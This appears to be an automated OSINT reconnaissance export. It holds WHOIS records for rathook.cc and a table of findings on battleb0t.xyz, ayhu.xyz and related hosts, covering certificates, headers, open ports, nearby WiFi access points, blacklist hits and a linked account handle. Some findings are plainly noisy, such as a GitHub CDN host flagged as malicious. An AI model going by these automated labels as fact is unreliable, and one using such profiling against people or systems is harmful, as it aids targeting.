>>> Last update of WHOIS database: 2023-05-12T03:11:56Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the
expiration date of the domain name registrant's agreement with the
sponsoring registrar. Users may consult the sponsoring registrar's
Whois database to view the registrar's reported date of expiration
for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign's ("VeriSign") Whois
database is provided by VeriSign for information purposes only, and to
assist persons in obtaining information about or related to a domain name
registration record. VeriSign does not guarantee its accuracy.
By submitting a Whois query, you agree to abide by the following terms of
use: You agree that you may use this Data only for lawful purposes and that
under no circumstances will you use this Data to: (1) allow, enable, or
otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via e-mail, telephone, or facsimile; or
(2) enable high volume, automated, electronic processes that apply to
VeriSign (or its computer systems). The compilation, repackaging,
dissemination or other use of this Data is expressly prohibited without
the prior written consent of VeriSign. You agree not to use electronic
processes that are automated and high-volume to access or query the
Whois database except as reasonably necessary to register domain names
or modify existing registrations. VeriSign reserves the right to restrict
your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
Domain Name: RATHOOK.CC
Registry Domain ID: 163793658_DOMAIN_CC-VRSN
Registrar WHOIS Server: whois.porkbun.com
Registrar URL: http://www.porkbun.com
Updated Date: 2022-01-28 17:32:18
Created Date: 2021-09-13 01:07:39
Registrar Registration Expiration Date: 2024-09-13 01:07:39
Registrar: Porkbun LLC
Registrar IANA ID: 1861
Registrar Abuse Contact Email: abuse@porkbun.com
Registrar Abuse Contact Phone: +1.5038508351
Domain Status: clientTransferProhibited http://icann.org/epp#clientTransferProhibited
Domain Status: clientDeleteProhibited http://icann.org/epp#clientDeleteProhibited
Registry Registrant ID:
Registrant Name: d3f c0n6
Registrant Organization: Boat Rolling Inc
Registrant Street: 10 Voie de l'Excelsior
Registrant City: Val-de-Reuil
Registrant State/Province: Normandy
Registrant Postal Code: 27100
Registrant Country: FR
Registrant Phone: +33:FR.268605683
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: d3fc0n6@protonmail.com
Registry Admin ID:
Admin Name: d3f c0n6
Admin Organization: Boat Rolling Inc
Admin Street: 10 Voie de l'Excelsior
Admin City: Val-de-Reuil
Admin State/Province: Normandy
Admin Postal Code: 27100
Admin Country: FR
Admin Phone: +33:FR.268605683
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: d3fc0n6@protonmail.com
Registry Tech ID:
Tech Name: d3f c0n6
Tech Organization: Boat Rolling Inc
Tech Street: 10 Voie de l'Excelsior
Tech City: Val-de-Reuil
Tech State/Province: Normandy
Tech Postal Code: 27100
Tech Country: FR
Tech Phone: +33:FR.268605683
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: d3fc0n6@protonmail.com
Name Server: curitiba.ns.porkbun.com
Name Server: fortaleza.ns.porkbun.com
Name Server: salvador.ns.porkbun.com
Name Server: maceio.ns.porkbun.com
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net
>>> Last update of WHOIS database: 2022-01-28 17:32:18 <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
The Data in the Porkbun LLC WHOIS database is provided by Porkbun LLC for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Porkbun LLC does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this Data only for lawful purposes and that, under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail (spam); or (2) enable high volume, automated, electronic processes that apply to Porkbun LLC (or its systems). Porkbun LLC reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Porkbun!
|
| 2023-05-12 03:11:12 | Physical Coordinates | No | OpenStreetMap | 77 | 0 | 4 | 0 | None | 33.6170672,-111.90564645297056 | 14455 North Hayden Rd, Scottsdale, US-AZ, US, 85260 |
| 2023-05-12 02:44:17 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:50c0:8003::153 | www.battleb0t.xyz |
| 2023-05-12 02:44:15 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Express | nwapi2.battleb0t.xyz |
| 2023-05-12 02:59:44 | Co-Hosted Site - Domain Whois | No | Whois | 1 | 0 | 2 | 0 | None | Domain Name: GITHUBUSERCONTENT.COM
Registry Domain ID: 1845671923_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2022-01-05T09:12:39Z
Creation Date: 2014-02-06T21:17:00Z
Registry Expiry Date: 2024-02-06T21:17:00Z
Registrar: MarkMonitor Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2086851750
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: DNS1.P01.NSONE.NET
Name Server: DNS2.P01.NSONE.NET
Name Server: DNS3.P01.NSONE.NET
Name Server: DNS4.P01.NSONE.NET
Name Server: NS-1411.AWSDNS-48.ORG
Name Server: NS-181.AWSDNS-22.COM
Name Server: NS-1867.AWSDNS-41.CO.UK
Name Server: NS-596.AWSDNS-10.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
| githubusercontent.com |
| 2023-05-12 02:54:13 | Web Content Type | No | Web Spider | 0 | 0 | 3 | 0 | None | text/css | https://ayhu.xyz/cdn-cgi/styles/challenges.css |
| 2023-05-12 03:03:17 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | mail.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:89:7c:23:d8:89:20:d1:c5:b3:ae:30:91:44:3a:23:81:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 14 03:53:54 2022 GMT
Not After : Mar 14 03:53:53 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:e5:dd:af:99:9d:87:f1:20:42:ec:19:5a:16:81:
fd:0e:9d:26:43:5b:38:56:01:6c:b9:50:e6:f5:f6:
b7:f4:d9:bc:a6:0e:cd:0a:31:b3:8d:bb:24:04:a8:
02:3f:69:7e:f7:45:10:b5:ca:a5:a1:b5:01:ba:b7:
e8:82:36:5d:7d:4a:67:2b:ea:ed:c8:9d:a8:7d:86:
41:b8:e4:07:fc:50:be:f8:c2:12:f9:9a:f1:3d:47:
b3:9a:27:60:00:dc:a5:4f:8f:6f:e6:86:11:01:b1:
d6:45:d6:cf:7d:92:d8:dd:11:ac:e5:b9:41:b6:0c:
38:5e:c6:36:d3:ff:6e:0d:84:9c:c2:8a:cc:3f:7f:
39:73:81:05:d0:7c:d4:98:d7:c4:2e:70:4d:8f:5d:
72:05:90:a8:a3:08:60:0e:68:3c:fe:ac:07:23:66:
f2:29:3f:3b:9e:fe:9e:1a:5d:c2:2b:f9:d5:68:01:
b1:7f:26:80:2c:5d:d8:4c:d8:54:56:d0:35:f9:31:
4d:76:6c:1a:c1:ba:c3:e7:3a:74:2f:ed:05:4b:a4:
71:2f:df:1e:d5:dc:b9:23:46:96:17:ad:cc:ef:a5:
ee:d7:26:ac:0b:5d:33:ef:55:fd:c5:75:d0:bb:f3:
29:99:ce:33:73:02:ba:2d:3b:cc:c0:6b:10:49:90:
f8:db
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
3D:15:56:A1:3D:00:5C:E7:21:10:87:5C:48:60:81:D6:19:B0:97:7A
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:cpanel.ayhu.xyz, DNS:cpcalendars.ayhu.xyz, DNS:cpcontacts.ayhu.xyz, DNS:mail.ayhu.xyz, DNS:webdisk.ayhu.xyz, DNS:webmail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 14 04:53:54.573 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D2:4D:1F:4C:53:A2:2C:16:48:36:E0:
E3:59:95:10:4D:AC:DA:52:1A:46:2E:19:E7:DA:3A:94:
30:B2:B6:AF:0D:02:21:00:B0:C6:A1:4B:9B:FE:4E:59:
8A:FC:46:1B:75:55:34:A2:8C:0A:51:5A:D3:3F:C3:63:
FB:4F:E2:E6:C3:EE:2C:9A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 04:53:55.080 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:ED:EC:3B:A7:32:A8:30:D7:4E:2F:1A:
02:02:BB:D6:DD:30:69:59:5A:E6:97:33:2E:BA:E1:81:
BB:CB:99:00:02:21:00:D4:02:BD:53:9C:06:85:84:2D:
D9:33:CD:60:59:DF:DC:44:B2:4C:A9:FF:8D:9F:75:90:
F0:18:EF:92:21:63:F2
Signature Algorithm: sha256WithRSAEncryption
47:e5:47:8a:5f:84:37:c0:02:97:35:aa:f2:b0:78:40:e7:a7:
4b:75:22:0b:a5:fb:81:51:db:7f:48:05:05:cf:56:dd:69:5f:
ff:a9:81:35:df:0e:37:63:bc:cf:e9:04:35:2e:93:0d:cb:ec:
3b:29:06:9b:cc:f9:88:91:0c:0c:6c:50:03:1e:f2:37:b0:d2:
3a:51:bd:ea:2e:d4:c1:14:23:12:fa:23:c6:0b:23:6d:59:64:
37:c1:19:f0:fc:0a:70:3f:3e:a2:ba:a9:1b:1a:a0:9a:c0:a8:
92:f0:f6:cb:41:69:32:ab:f7:f7:32:b0:fb:af:db:e0:fa:c9:
05:b6:49:21:d5:48:07:23:f4:14:1e:e6:16:03:17:40:fa:84:
7e:34:ed:67:8d:2b:63:9c:57:50:bd:40:57:13:4f:56:ea:0d:
6b:4e:d6:08:40:d4:cb:ee:ab:df:5c:7f:66:51:e8:c5:80:2c:
36:f3:57:45:b8:4e:cf:13:55:68:05:43:37:5d:53:06:76:78:
12:7a:43:6a:d4:09:c5:e2:b2:a3:69:4f:a7:d9:91:58:86:8d:
48:37:1c:60:ed:eb:48:b9:bd:5d:b1:4d:ac:af:9b:5b:a2:ab:
a6:a4:49:fb:f3:b8:d3:3f:2c:d0:72:37:b1:a4:ae:8b:5e:82:
84:78:32:a1
|
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | eminent819 (Net ID: 00:14:5C:87:8C:58) | 50.8897, 6.0563 |
| 2023-05-12 03:00:56 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.88): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2WIRE681 (Net ID: 00:02:2D:68:92:B3) | 37.7642, -122.3993 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | tripadvisor (Category: social)
https://www.tripadvisor.com/Profile/Altpapier | Altpapier |
| 2023-05-12 03:24:33 | Malicious Affiliate | Yes | VXVault.net | 0 | 1 | 4 | 0 | None | VXVault Malicious URL List [cdn-185-199-108-154.github.com]
http://vxvault.net/URL_List.php | cdn-185-199-108-154.github.com |
| 2023-05-12 02:53:56 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:b3:d3:7f:a8:50:41:aa:70:38:c6:ab:16:2e:24:50:f9:66
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 29 13:55:16 2022 GMT
Not After : Mar 29 13:55:15 2023 GMT
Subject: CN=tiktok.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:tiktok.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3c:48:04:ac:20:99:db:ca:ca:6a:cc:70:e1:43:3e:81:e0:75:
d7:27:b2:3e:bf:0a:2c:b9:85:20:f8:d1:95:d7:8e:f6:e5:e7:
34:bf:dd:34:59:cd:80:f7:bc:54:a0:98:88:5b:c3:c9:31:8c:
d5:fb:f3:f4:99:19:e3:f7:7b:0e:cf:b8:fd:2e:98:1e:df:5e:
bd:32:3e:95:6e:85:fd:3c:39:51:1e:b7:ca:45:bb:af:6c:d9:
7d:bb:b2:5a:16:0a:ba:b6:2c:18:38:cf:10:14:91:d1:4e:1e:
9e:4a:61:8d:0a:4f:5a:cd:71:50:15:21:8b:cd:1e:13:69:3b:
32:8b:47:84:8b:ff:c8:9a:db:3a:ad:fc:8a:2a:31:1f:ec:36:
13:1f:de:24:59:1f:25:65:d4:e8:c7:48:dd:a5:f3:44:51:45:
44:37:47:80:9f:8c:0d:17:6e:d2:9a:8a:53:98:c4:b7:c5:92:
92:58:25:fc:e6:3b:4e:df:03:44:8a:de:9f:fe:7a:58:8e:b2:
30:ab:13:3d:69:81:47:99:7f:37:6f:80:60:8a:d3:9e:ba:df:
ab:68:1e:a3:61:1c:dd:77:2a:1c:ae:ee:b6:17:f1:05:72:d2:
ee:bb:6e:b1:5f:2b:66:a2:ce:5c:75:86:24:dc:66:4d:87:3e:
95:cd:4d:fe
| battleb0t.xyz |
| 2023-05-12 02:56:56 | Internet Name | No | DNS Resolver | 0 | 0 | 6 | 0 | None | www.ayhu.xyz | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60726fad1912')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="kO2xNaAYVVwzudN_grHGsSAbBGIYi5Rp9eWkwq8bobk-1683860063-0-AQEme0OuFvC27LD-nLe2jrmTTnxOgSGtlJ79kOqNI8O_bMBUHsCUifsyrQtE2Qw_5-G3wZLVyXKSq4HyXvLjyCiAdaCGs4Ok-COq8gyypPok4HyuqEcnabkOPj9JKzn7fzxQf8pA4avsXNbgzL5RFZ0OappR_ENyOliTj3y1usOCEfdx0Qw-4NtIYkgBrlm6HYt1w2WiYgJIzvrwK3xMFits_Ebjt14epXfZCroTuFIFxaYyyRcuJJEK3ck04c2JtRdR99xcpwbep8NMi6CNOGP-aAH4FLQSKV1p7HK0fEmUDFvoadw-7bo2EucRyXYFLEbjS7Z_OKl0Srfy1Vim3Z_jqewduFNgcp1B-ir-aT25S4z2lvk1aBpRpS3Fpn4bKR_T7uQSek6SD4z_I81JUPCm-TbJt2WcAviPmmrfZDtigYqwaDeqh4Pqa29XowW1l1nnKs6qCFhQeaLuigzJf9PhtuPk6Ts6nn4TNWVyl9ze9NMDXt3HC-u5rh_1KxQxsTY_4JhB1jT5PYZQMJUvzkddK2MPm_CtJJRmvzu4A8h1xyRkeTxVWjg5p76zqZFKP8HOoZP1u7GkAK20kE8vR-O-Gy6CmmKj5hSdpF5vjt71wmiC0vDCk1rDRhhcEkt92S6uijW7cxkpckY78siJqFhpHOVFodJroZuf7HFMwvosFXQ5NGYyHEQXXlmkoclMMK3rVJNdxiIstjCLFnDxNsbd1epvptoA5TGFKFTmHs6QjRzTIv_BIuw1QORH1eUHK9O9N-txmFD1IbLACf92gVKiwNsAAtrRtW2F06n6d9Vs_GXVIbPcV6cwsJdIquww9NaI78ELNHJNq1J_tTdFxBZavYogbVnqkQFRmkO2l5VXSM6E9dcoOwi5q4qHSrZmlxJHiqDY-PKE8PDBSk8akurNHoBfBjtw2_a1RfC_lu8B7yXfZ1SNiql9epxt9-xA01ZEs-JXEIWKB7DVUehYb7RiTKZ_trIoGgh7Q6yEfeLCDTtC1yC2iiOVhPkX_h4Qfaf7LfPKruh9cjrbe0r7qMb0h8bIRy1fsQXVXXjhWHUJzLPbbOWh7F_0GW3qFusmjdR_P6sJL-gXtd5koZkzn6EK_YdKJO6jY9uPxr4sRnkK0ioS_0VfK7kQax3cDEA5YcxYvkmmBl4DMVhT7ISnmS5G8dSMhHOdJpbJMK5G9qQm8E9Nux-WgwCPgj6TkAmQMz1NenXnJJdqz-irhHABa_tynmZ1IPtBtnIPWbu4Mgp5VyNXvvUpfdGX7V6s-SjMtH9NRG3i4YZDcDp72B0EVaiT4n2jNeEilDlbVLw8k42_nwTD7Pw7hKXZpTyQQZntWW5wgIly7x0dOOWeJl6TsZIiDLpQjNv-mLX_xQzZHdw5kii58Ccy2XJ4npuVEuBraZJ9n6B2-5AwWyV3Qr3DTuk5PmfcIxKTr_u7HsbpdFR4FKp9wurJ9rvdDIpbL_yKOtyqM9yLjxeOpIdNG7zFw8AT7XqbUfz26ewFlzRX_Cc5FOV6ATYROS3OVpko2KV-NVpYQTJgT-fYvExK0W6Ze5BMg7wpM4RSZGt0EBF4MTRkHZYYHYqVG2Gs4Dr0KphCmDsWmTYs-Wp4YmyX8zHXt6eDU7SHKTxfT3pFaOqsKIwmwk1FnA5ZOhkDp5FB4KDNaO4UI8hC2NqGaVRdddker5xFPIyxy6_xtT-933_JQEm4Yo3p33SKpnr5oZLDUmiFpcGiocX8E23z9qF6KzqiLjSYYuEdSQjfT3AOVajEAM3LV2cJ-Yfb6qV1mYvKIEbYataggM_S7XSDOMFwSxuBJJhFB_YuSQY42F1bw3h-Wr_txcqos6CYojszcuJZzN7ZQwVv-pfKRrZP1vW37Ji7qXYRsXGXizVLTDb80myaduEuuPiE3
j_iEUTMQHyX7FS77GwsNXMOnK-SOX4LESTyuge5gQCwNBG5LYbWqG1phc6ZBmjChX4XXPYEWTd6pqzDCahUeE-UBjC440QhIoggi4SFzrJT424_2pz3I1Z7K9v14oR0ixYp8X0YQSjX1TvMb1hvE05cdAoJpi9QPGYD511Yvrjtr2-nQRWT9vJBLGPT61xgS5JvfKWkR5mzvNMNLXnN-QaI-YMwAUvPR8sObbMc6Js74f0zl0__XqC1L4ZGx1B6W2mPRUMY1Lrg2rh8ki2L2eiGI4MSaqbVecE9vJyl6XPRcjgNKIcsC-zohWzf7sSDfofcLJcUO1xeUIJMC_3B3JBlhmMy_ukD9DKdx40muRRW18iGtfkoFnEyb5ylZEa9Cy6RH0tiulb9zDYu9lBPk43UYKuS0gITgFj7t6HoYRbYh8Mhdn_KQTmpy5fsQY55ZC7EUgiiqGZ2kxox4gPzr-qiw2zxNU0kuoof8T7V06bM_gPceZS49qqZ0qEgovgoUQEY1PrObCR2N_zXcey5RpH4biNXy5X3XHfa8DJrozVWuJVN7xKblnML0zEboEJxIy0gm8PmeTSLtq0S2uPc6VyK0a0Z4v1q4hj82ek">
</form>
</div>
</div>
</body>
</html>
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:B9:5F:B7) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:15:36 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | Colombia | 188.114.97.1 |
| 2023-05-12 02:53:56 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 54113 | 2606:50c0:8001::153 |
| 2023-05-12 02:50:30 | Legal Entity Identifier | No | GLEIF | 0 | 0 | 3 | 0 | None | 54930014QNWWH8OAC930 | GoDaddy.com, LLC |
| 2023-05-12 02:54:12 | Linked URL - Internal | No | Web Spider | 0 | 0 | 1 | 0 | None | http://battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | Saint Helena | scoop.sh |
| 2023-05-12 02:54:21 | HTTP Headers | No | Web Spider | 3 | 0 | 3 | 0 | None | {"transfer-encoding": "chunked", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "server": "cloudflare", "connection": "keep-alive", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:21 GMT", "x-frame-options": "SAMEORIGIN", "referrer-policy": "same-origin", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f606679610ce9-EWR"} | vscode.battleb0t.xyz |
| 2023-05-12 02:53:35 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 185.199.110.153 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 7717 7361 (Net ID: 00:00:C5:FC:FE:34) | 37.780462,-122.390564 |
| 2023-05-12 03:41:52 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 45.131.109.53:445 | 45.131.109.53 |
| 2023-05-12 02:44:10 | Co-Hosted Site | No | SSL Certificate Analyzer | 2 | 1 | 1 | 0 | None | githubusercontent.com | battleb0t.xyz |
| 2023-05-12 02:46:49 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | Certificate: | 104.196.30.220 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MGOKCEN (Net ID: 00:14:C1:2B:03:F6) | 40.2024, 29.0398 |
| 2023-05-12 02:44:06 | Domain Registrar | No | Whois | 0 | 0 | 1 | 0 | None | GoDaddy.com, LLC | ayhu.xyz |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 172.67.168.252 |
| 2023-05-12 03:32:17 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.9:443 | 188.114.97.0/24 |
| 2023-05-12 02:44:20 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate: | battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-4030 (Net ID: F8:1D:0F:69:40:38) | 37.751, -97.822 |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.89): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | wirelessnet (Net ID: 00:04:5A:F9:8F:10) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 12M-5G20E240 (Net ID: 00:01:9F:20:E2:44) | 34.0544, -118.244 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | cf-ray: 7c5f60688e300ce1-EWR | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:21 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-1f4d\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:21 GMT", "cf-ray": "7c5f60688e300ce1-EWR", "content-type": "text/css", "x-frame-options": "DENY"} |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | BVITestNetz (Net ID: 00:01:E3:47:0D:EB) | 50.1188, 8.6843 |
